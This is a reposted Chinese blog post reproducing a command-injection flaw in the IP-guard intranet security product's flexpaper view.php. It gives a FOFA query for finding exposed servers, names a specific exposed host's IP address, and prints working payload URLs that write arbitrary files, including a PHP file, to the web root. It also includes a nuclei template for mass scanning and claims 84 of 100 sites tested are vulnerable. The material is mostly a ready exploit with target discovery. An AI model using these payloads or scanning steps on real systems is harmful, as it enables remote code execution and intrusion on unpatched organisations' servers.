【转载】IP-guard 1day漏洞复现

#0x00
IP-guard研发厂商溢信科技，创立于2001年，是国内比较早从事内网安全产品开发的企业，始终致力于对企业内网安全问题的研究和解决。十九年服务于内网安全领域，积累了丰富的经验，为数万家企业量身打造了内网安全解决方案。

#0x01
fofa搜索漏洞

app="IP-guard"

IP-guard
http://139.9.242.115:59999/ipg/

界面显示如下

#0x02
构造POC

/ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+test123+>test1.txt

访问test1.php页面，可以见写入命令

构造POC

/ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+^%3C?php+phpinfo();+?^%3E+>test1.php

访问页面可以解析phpinfo，威胁极大

使用fofax+nuclei编写脚本，100个网站中有84个存在漏洞！

nuclei脚本如下：

#####################################################

id: ip-guard-2

info:
  name: Template Name
  author: xiaoxin
  severity: info
  description: description
  reference:
    - https://
  tags: tags

requests:
  - raw:
      - |+
        GET /ipg/static/appr/lib/flexpaper/php/test.txt HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Connection: close
        Cookie: ipg_session=rqv3v4q028t2al5na92am2l7od7hn4qr
        Upgrade-Insecure-Requests: 1
        Pragma: no-cache
        Cache-Control: no-cache

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - '123456'
      - type: status
        status:
          - 200

#####################################################
————————————————

版权声明：本文为博主原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接和本声明。
                        
原文链接：https://blog.csdn.net/weixin_47124866/article/details/134564780